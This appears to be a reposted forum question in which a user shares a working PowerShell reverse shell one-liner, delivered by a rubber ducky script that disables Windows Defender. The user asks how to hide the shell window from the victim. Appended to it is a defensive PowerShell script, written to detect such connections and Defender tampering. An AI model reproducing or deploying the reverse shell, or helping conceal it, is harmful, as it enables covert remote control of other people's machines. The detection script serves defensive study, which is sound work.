Can I hide my powershell reverse shell?

Hi, recently I learned about reverse shells and I managed to successfully get both Windows and Linux reverse shells to work, which got me very excited. I then went on to make my own PowerShell rubber ducky script that disables Windows Defender and runs the PowerShell reverse shell one-liner:

$client = New-Object System.Net.Sockets.TCPClient("[ip address]",port);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

This works great and all, but it seems like the PowerShell window needs to be open for the connection to stay open. Currently, the best I can do is minimize the PowerShell window, but it's still pretty obvious even to a normal user.

I thought of 2 possibilities:

1) Maybe there is a way to run a PowerShell command in the background.

2) Maybe there is a way to form another type of hidden reverse shell (?) after getting a reverse shell in the first place with the one-liner above.

I could not find any solutions for my scenario, so if you guys have any ideas please state them below, thanks.

Attacker machine: Manjaro Linux

Victim box: Windows 10 home

submitted by /u/Super_Tsumu

from hacking: security in practice https://ift.tt/YnsXi3w
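From the defender's side, the behaviour the post describes has two host-visible signals: a powershell.exe process holding an established outbound TCP connection to an unusual port, and Windows Defender real-time protection being turned off. The following script is an added example written for this page; it is not code from the post or its author. It only uses built-in cmdlets (Get-Process, Get-NetTCPConnection, Get-CimInstance, Get-MpComputerStatus, Get-WinEvent); the function names, the list of "ordinary" remote ports and the assumption that the Defender module is present on the host are mine.

```powershell
# Added example (not from the original post): hunt for PowerShell processes that hold an
# established outbound TCP connection, which is what the reverse shell above looks like
# from the host side, and check whether Defender real-time protection has been disabled.
# Assumes Windows 10 with the NetTCPIP and Defender PowerShell modules available.

function Get-SuspiciousPowerShellConnections {
    [CmdletBinding()]
    param(
        # Remote ports treated as ordinary for a PowerShell process (HTTP/S, PS remoting).
        # This allow-list is an assumption for the example; tune it to your environment.
        [int[]]$AllowedRemotePorts = @(80, 443, 5985, 5986)
    )

    # Both Windows PowerShell (powershell.exe) and PowerShell 7 (pwsh.exe) are considered.
    $shells = @(Get-Process -Name powershell, pwsh -ErrorAction SilentlyContinue)
    if ($shells.Count -eq 0) { return @() }
    $shellIds = $shells | ForEach-Object { $_.Id }

    Get-NetTCPConnection -State Established -ErrorAction SilentlyContinue |
        Where-Object {
            $shellIds -contains $_.OwningProcess -and
            $AllowedRemotePorts -notcontains $_.RemotePort
        } |
        ForEach-Object {
            $conn = $_
            $proc = Get-CimInstance Win32_Process -Filter "ProcessId = $($conn.OwningProcess)"
            $shell = $shells | Where-Object { $_.Id -eq $conn.OwningProcess }
            [pscustomobject]@{
                ProcessId     = $conn.OwningProcess
                ProcessName   = $proc.Name
                CommandLine   = $proc.CommandLine      # the one-liner is visible here
                LocalAddress  = $conn.LocalAddress
                RemoteAddress = $conn.RemoteAddress
                RemotePort    = $conn.RemotePort
                # A shell with no main window is one the user cannot see on the taskbar.
                HasWindow     = ($shell.MainWindowHandle -ne [IntPtr]::Zero)
            }
        }
}

function Test-DefenderTampering {
    # Get-MpComputerStatus is absent on hosts without the Defender module.
    $status = Get-MpComputerStatus -ErrorAction SilentlyContinue
    if (-not $status) { return $null }

    # Event 5001 in the Defender operational log records real-time protection being disabled.
    $disableEvents = Get-WinEvent -FilterHashtable @{
        LogName = 'Microsoft-Windows-Windows Defender/Operational'
        Id      = 5001
    } -MaxEvents 5 -ErrorAction SilentlyContinue

    [pscustomobject]@{
        RealTimeProtectionEnabled = $status.RealTimeProtectionEnabled
        AntivirusEnabled          = $status.AntivirusEnabled
        TamperProtected           = $status.IsTamperProtected
        RecentDisableEvents       = @($disableEvents).Count
        LastDisableTime           = if ($disableEvents) { $disableEvents[0].TimeCreated } else { $null }
    }
}

$findings = @(Get-SuspiciousPowerShellConnections)
if ($findings.Count -gt 0) {
    Write-Warning "PowerShell process(es) with an unexpected established TCP connection:"
    $findings | Format-Table -AutoSize
} else {
    Write-Output "No PowerShell process with an unexpected established TCP connection."
}
Test-DefenderTampering | Format-List
```

Run it from an elevated prompt so that Get-NetTCPConnection can map connections to their owning processes and Get-WinEvent can read the Defender log. A hit with HasWindow set to False, a command line containing New-Object System.Net.Sockets.TCPClient, and RealTimeProtectionEnabled False is exactly the combination the post is asking about, which is why these three properties belong together in the output.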
